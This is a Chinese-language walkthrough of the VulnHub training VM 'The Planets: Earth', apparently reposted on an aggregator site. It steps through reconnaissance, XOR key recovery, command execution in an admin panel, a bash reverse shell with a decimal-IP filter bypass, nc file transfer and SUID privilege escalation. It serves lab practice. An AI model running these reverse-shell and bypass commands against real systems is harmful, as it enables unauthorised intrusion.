靶場練習第二天~vulnhub靶場之 THE PLANETS: EARTH

前期準備:

靶機下載鏈接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取碼: gguw

kali攻擊機ip:192.168.101.10

靶機地址:192.168.101.101

一、信息收集

1.nmap掃描

因為kali與靶機在同一個網段下,使用nmap 192.168.101.0/24 掃描靶機及端口

2.使用nmap -A 192.168.101.101,發現443端口有DNS解析,在hosts文件中添加DNS解析:

使用sudo vim /etc/hosts添加兩個hosts文件

3.收集earth.local信息

發現有Previous Messages

Previous Messages:

??? 37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

?? ?3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

??? 2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

使用命令dirb https://earth.local掃描一下目錄,發現 https://earth.local/admin 目錄

進去發現是個登錄界面

4.收集terratest.earth.local信息

使用命令dirb https:// terratest.earth.local掃描一下目錄,發現有robots.txt文件,去查看一下

進入https://terratest.earth.local/robots.txt后,發現有個testingnotes文件,但是不知道是哪種格式

手動測試后發現是txt格式,訪問testingnotes.txt

譯文:

測試安全消息系統注意事項:

*使用XOR加密作為算法,在RSA中使用應該是安全的。

*地球已確認他們已收到我們發送的信息。

*testdata.txt 用于測試加密。

*terra 用作管理門戶的用戶名。

去做:

*我們如何安全地將每月的密鑰發送到地球? 或者我們應該每周更換鑰匙?

*需要測試不同的密鑰長度以防止暴力破解。 鑰匙應該多長時間?

*需要改進消息界面和管理面板的界面,目前非常基礎。

這里我們得到了新的信息,加密算法是 XOR,并且有一個testdata.txt文檔用于測試加密,用戶名是terra,先訪問testdata.txt并保存:

二、漏洞攻擊

1.破解密碼

寫個簡單py腳本,選一個Previous Messages數據,然后與 testdata.txt 進行一下 XOR 運算,得到密鑰

Py腳本:

import binascii

data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

print(hex(int(data1,16) ^ int(f,16)))

運行后得到以下數據

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

十六進制轉文本解碼一下:

密碼是重復的,然后使用用戶名 terra ,密碼:earthclimatechangebad4humans 登錄 https://earth.local/admin

2.發現user_flag

發現可以執行系統命令:

使用find命令查找flag:

發現/var/earth_web/user_flag.txt文件,查看一下:

發現flag [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

3.使用反彈shell連接到靶機

接下來編寫個反彈shell:

bash -i >& /dev/tcp/192.168.101.10/1234 0>&1

發現禁止遠程連接,發現需要對IP進行進制繞過:

bash -i >& /dev/tcp/3232261386/1234 0>&1

三、提權

查找有權限的命令:

find / -perm -u=s -type f 2>/dev/null

發現有個/usr/bin/ ,感覺可以提權,查看它,運行一下reset_root:

發現報錯

檢查是否存在重置觸發器...

重置失敗,所有觸發器都不存在。

本地沒有調試的命令,使用nc傳送到本地調試一下

nc -nlvp 1234 >reset_root

nc 192.168.101.10 1234 < /usr/bin/reset_root

用strace檢測問題,要注意給文件加權限命令為chmod +x ,因為沒有以下三個文件而報錯,查看靶機發現也沒有這三個文件:

在靶機中創建這三個文件:

然后再靶機中嘗試運行reset_root:

取得root權限,查找flag:

find / -name "*flag*.txt"

cat /root/root_flag.txt

cat /var/earth_web/user_flag.txt

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375081.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375081.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375081.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

測試與封裝5.1

我的隊友是52吳舒婷&#xff0c;博客內容主要是白盒黑盒的測試數據分析 我們通過簡單的四則運算來進行程序的測試與封裝 我們主要完成的是事情 &#xff08;1&#xff09;封裝&#xff1a;將運算要運用的方法進行封裝 文件主要有三個&#xff1a;Calculate&#xff08;存放運算…

springmvc學習筆記--mybatis--使用插件自動生成實體和mapper

由于表對象在開發過程中會增刪字段&#xff0c;有時候需要重新生成實體和對應的mapper&#xff0c;這時候可以通過mybatis的插件的生成。 優點是快速簡潔&#xff0c;缺點同樣很明顯&#xff1a;覆蓋。因此&#xff0c;通常是在第一次搭建框架的時候使用&#xff0c;因為開發過…

靶場練習第三天~vulnhub靶場之narak

靶機下載鏈接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取碼: dhr5 一、信息收集 1.使用namp 192.168.101.0/24掃描該網段的地址&#xff0c;尋找靶機IP 2.直接訪問192.168.101.102 3.進行目錄掃描&#xff0c;dirb目錄掃描工具&#xff08;kali自帶的&#xff…

hdu 1754 塊狀鏈表 單點修改+單點查詢

經典的線段樹題目&#xff0c;也可以用塊狀鏈表做。 1 #include <iostream>2 #include <cstring>3 #include <cstdio>4 #include <cmath>5 using namespace std;6 7 const int N 200000;8 const int M 800;9 int n, m, tot;10 11 int max( int a, in…

靶場練習第四天~vulnhub靶場之Lazysysadmin

靶機下載鏈接: https://pan.baidu.com/s/1MMkgaYLRc78YX4s6nvqdjQ 提取碼: djpm 信息收集 查看kali的IP 使用nmap 192.168.101.0/24 探測靶機IP 發現開放445端口&#xff0c;并且開放的服務microsoft-ds。可以用enum4linux工具來掃描共享文件&#xff0c;使用方法: enum4linux…

關于代碼手寫UI,xib和StoryBoard

代碼手寫UI 這種方法經常被學院派的極客或者依賴多人合作的大型項目大規模使用。Geek們喜歡用代碼構建UI&#xff0c;是因為代碼是鍵盤敲出來的&#xff0c;這樣可以做到不開IB&#xff0c;手不離開鍵盤就完成工作&#xff0c;可以專注于編碼環境&#xff0c;看起來很cool很高效…

ODAC(V9.5.15) 學習筆記(十)TVirtualTable

名稱 類型 說明 Options TVirtualTableOptions 選擇項&#xff0c;包括&#xff1a; voPersistentData&#xff1a;在數據集關閉時不處理其相關數據內容 voStored&#xff1a;設計期對數據集的處理以及錄入的數據將保存在DFM文件中 AddField 增加一個字段&#xff0c…

SQLSERVER如何獲取一個數據庫中的所有表的名稱、一個表中所有字段的名稱

1.查詢數據庫中的所有數據庫名&#xff1a; 1 SELECT Name FROM Master..SysDatabases ORDER BY Name 2.查詢某個數據庫中所有的表名&#xff1a; 1 SELECT Name FROM SysObjects Where XTypeU ORDER BY Name 3.查詢表結構信息&#xff1a; 1 SELECT (case when a.colorder1 …

靶場練習第五天~vulnhub靶場之basic_pentesting_1

一、信息收集 1.主機發現 靶機下載鏈接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取碼: i8hv &#xff08;1&#xff09;Netdiscover&#xff1a;專用的二層發現工具&#xff0c;擁有主動和被動發現兩種方式 具體操作如下&#xff0c;查看一下kali的ip 然后使用…

計算機網絡學習筆記(二) 計算機網絡結構

什么是網絡結構&#xff1f; n 網絡邊緣: 主機網絡應用 n 接入網絡&#xff0c;物理介質:有線或無線通信鏈路 n 網絡核心&#xff08; 核心網絡&#xff09; :互聯的路由器&#xff08;或分組轉發設備&#xff09;網絡之網…

Javascript常用的設計模式詳解

Javascript常用的設計模式詳解 閱讀目錄 一&#xff1a;理解工廠模式二&#xff1a;理解單體模式三&#xff1a;理解模塊模式四&#xff1a;理解代理模式五&#xff1a;理解職責鏈模式六&#xff1a;命令模式的理解&#xff1a;七&#xff1a;模板方法模式八&#xff1a;理解ja…

靶場練習第六天~vulnhub靶場之Lampiao

靶機下載鏈接: https://pan.baidu.com/s/1h0uiwvBkX8iXFyMAO23e1A 提取碼: 2kjp 一、信息收集 1.靶機發現 &#xff08;1&#xff09;靶機lampiao與kali均為NAT模式 ,Kali的 IP為192.168.101.10, 掃描網段用命令nmap -sp192.168.101.0/24&#xff0c;發現靶機ip為192.168.10…

生成百度地圖 如何弄

http://api.map.baidu.com/lbsapi/creatmap/index.html轉載于:https://www.cnblogs.com/qinqiu/p/4476747.html

內存泄露從入門到精通三部曲之排查方法篇

最原始的內存泄露測試 重復多次操作關鍵的可疑的路徑&#xff0c;從內存監控工具中觀察內存曲線&#xff0c;是否存在不斷上升的趨勢且不會在程序返回時明顯回落。這種方式可以發現最基本&#xff0c;也是最明顯的內存泄露問題&#xff0c;對用戶價值最大&#xff0c;操作難度小…

靶場練習第七天~vulnhub靶場之mrRobot

靶機下載鏈接: 百度網盤 請輸入提取碼 提取碼: sqv3 一、主機發現 1.用ifconfig查看kali的ip&#xff0c;因為kali和靶機都開啟了NAT模式&#xff0c;使用namp -sP 192.168.101.0/24探測靶機ip 二、信息收集 1.使用nmap掃描靶機 使用nmap -A 192.168.101.108 &#xff0c;查…

JAVA第二次試驗

北京電子科技學院&#xff08;BESTI&#xff09; 實 驗 報 告 課程&#xff1a;Java程序設計 班級&#xff1a;1352 姓名&#xff1a;潘俊洋 學號&#xff1a;20135230 成績&#xff1a; 指導教師:婁嘉鵬 實驗日期:2015.5.4 實驗密級&#xff1a…

【轉】怎么樣從一個瘋狂下載者成為一個學習者!!!值得反省下的問題·~~

為了方便廣大網友&#xff0c;各種網站也應運而生。當網絡的建設和發展正進行的如火如荼&#xff0c;喧鬧之中&#xff0c;搭配學習這壺美酒的&#xff0c;竟是一瓶名叫資料下載的毒藥&#xff0c;更糟糕的是&#xff0c;美酒和毒藥已經被灌到了同一個杯子里&#xff0c;渾然一…

靶場練習第八天~vulnhub靶場之CH4INRULZ_v1.0.1

一、前期準備 1.靶機下載 鏈接: 百度網盤 請輸入提取碼 提取碼: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主機發現&#xff0c;使用nmap命令 具體使用方法&#xff1a;nmap -sP 192.168.101.0/24 2.查看該靶機開放了哪些端口 nmap -A 192.168.101.109 直接訪問80端…

C# 不支持關鍵字: “.;database”。

解決方案分析:這個一定是鏈接字符串有問題&#xff0c;核對web.config 和程序的字符串是否有誤轉載于:https://www.cnblogs.com/louby/p/5208986.html

TImus 1073 Square Country DP

題意&#xff1a;給出一個數n(1<n<60000),這個數可以寫成一些數的平方的和&#xff0c; 問對于n&#xff0c;最少可以分成多少個數的平方的和。 比如&#xff1a;n344&#xff0c;則34418*184*42*2&#xff0c;輸出3. dp[i]表示i這個數最少可以分成多少個數的平方的和。 …